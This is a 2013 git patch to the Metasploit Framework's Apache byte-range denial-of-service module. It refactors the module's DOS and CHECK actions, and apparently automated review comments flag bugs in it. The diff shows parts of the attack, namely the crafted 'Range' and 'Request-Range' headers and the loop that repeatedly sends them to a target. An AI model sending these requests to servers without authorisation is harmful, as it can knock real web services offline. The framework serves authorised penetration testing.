From 7e28a4ddb0bf683b7fb7113cd7a06989dbe69e26 Mon Sep 17 00:00:00 2001
From: sinn3r
Date: Mon, 22 Apr 2013 15:41:47 -0500
Subject: [PATCH] Uses "ACTIONS" keys instead of datastore options

It's better to use ACTIONS instead of datastore in this case. Also, did some cleanup.
---
 .../auxiliary/dos/http/apache_range_dos.rb | 69 ++++++++++---------
 1 file changed, 35 insertions(+), 34 deletions(-)

diff --git a/modules/auxiliary/dos/http/apache_range_dos.rb b/modules/auxiliary/dos/http/apache_range_dos.rb
index b063d439e5..3cac36672a 100644
--- a/modules/auxiliary/dos/http/apache_range_dos.rb
+++ b/modules/auxiliary/dos/http/apache_range_dos.rb
@@ -1,7 +1,3 @@
-##
-# $Id$
-##
-
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
@@ -35,7 +31,12 @@ class Metasploit3 < Msf::Auxiliary
 'Markus Neis ' # check for vulnerability
 ],
 'License' => MSF_LICENSE,
- 'Version' => '$Revision$',
+ 'Actions' =>
+ [
+ ['DOS'],
+ ['CHECK']
+ ],
+ 'DefaultAction' => 'PUT',
 'References' =>
 [
 [ 'BID', '49303'],
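Review bot: `'DefaultAction' => 'PUT'` names an action that the new `'Actions'` list does not define; only `DOS` and `CHECK` are declared. With no matching action, `action` in `run_host` (next hunk) is presumably nil, so `case action.name` would raise instead of running either branch, and that `case` has no `else` to report an unknown action. The removed `OptEnum` defaulted to `DOS`, so `'DefaultAction' => 'DOS'` keeps the previous behaviour, while `'DefaultAction' => 'CHECK'` would make the non-disruptive probe the default and require an explicit choice before any DoS traffic is sent. The module info hash begins and ends outside this hunk.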
@@ -43,43 +44,44 @@ class Metasploit3 < Msf::Auxiliary [ 'EDB', '17696'], [ 'OSVDB', '74721' ], ], - 'DisclosureDate' => 'Aug 19 2011', + 'DisclosureDate' => 'Aug 19 2011' )) register_options( [ Opt::RPORT(80), OptString.new('URI', [ true, "The request URI", '/']), - OptInt.new('RLIMIT', [ true, "Number of requests to send",50]), - OptEnum.new('ACTION', [true, "DOS or CHECK", "DOS",["DOS","CHECK"]]) + OptInt.new('RLIMIT', [ true, "Number of requests to send",50]) ], self.class) end def run_host(ip) - case datastore['action'] + case action.name + when 'DOS' + conduct_dos() - when 'DOS' - conduct_dos() - - when 'CHECK' - check_for_dos() + when 'CHECK' + check_for_dos() end end def check_for_dos() path = datastore['URI'] - begin - res = send_request_cgi({ - 'uri' => path, - 'method' => 'HEAD', - 'headers' => { "HOST" => "Localhost", "Request-Range" => "bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10"} }) - - if (res and res.code == 206) - print_status("Response was #{res.code}") - print_status("Found Byte-Range Header DOS at #{path}") + begin + res = send_request_cgi({ + 'uri' => path, + 'method' => 'HEAD', + 'headers' => { + "HOST" => "Localhost", + "Request-Range" => "bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10" + } + }) + if (res and res.code == 206) + print_status("Response was #{res.code}") + print_status("Found Byte-Range Header DOS at #{path}") report_note( :host => rhost, @@ -87,16 +89,13 @@ class Metasploit3 < Msf::Auxiliary :data => "Apache Byte-Range DOS at #{path}" ) - else - print_status("#{rhost} doesn't seem to be vulnerable at #{path}") - - end + else + print_status("#{rhost} doesn't seem to be vulnerable at #{path}") + end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Timeout::Error, ::Errno::EPIPE - end - - + end end 
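Review bot: In `check_for_dos`, `if (res and res.code == 206)` sends a missing response down the same `else` path as a non-206 reply, so a host that never answered is printed as "doesn't seem to be vulnerable" (the `else` sits in the following hunk). A result that cannot tell "no answer" from "not vulnerable" is a false negative for whoever relies on the scan; use `elsif res` for the not-vulnerable message and a final `else` with `print_error("#{rhost} did not respond at #{path}")`. The empty `rescue` clauses after it drop connection failures in the same silent way. Separately, the probe sends `"HOST" => "Localhost"` while `conduct_dos` sends `"HOST" => rhost`, so on a name-based virtual host the check may be answered by a different site than the one the other action addresses; `"HOST" => rhost` would keep the two consistent.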
@@ -111,10 +110,12 @@ class Metasploit3 < Msf::Auxiliary
 begin
 print_status("Sending DoS packet #{x} to #{rhost}:#{rport}")
 res = send_request_cgi({
- 'uri' => uri,
- 'method' => 'HEAD',
- 'headers' => { "HOST" => rhost,
- "Range" => "bytes=0-#{ranges}"}},1)
+ 'uri' => uri,
+ 'method' => 'HEAD',
+ 'headers' => {
+ "HOST" => rhost,
+ "Range" => "bytes=0-#{ranges}"}},1)
+
 rescue ::Rex::ConnectionRefused
 print_status("Unable to connect to #{rhost}:#{rport}.")
 rescue ::Errno::ECONNRESET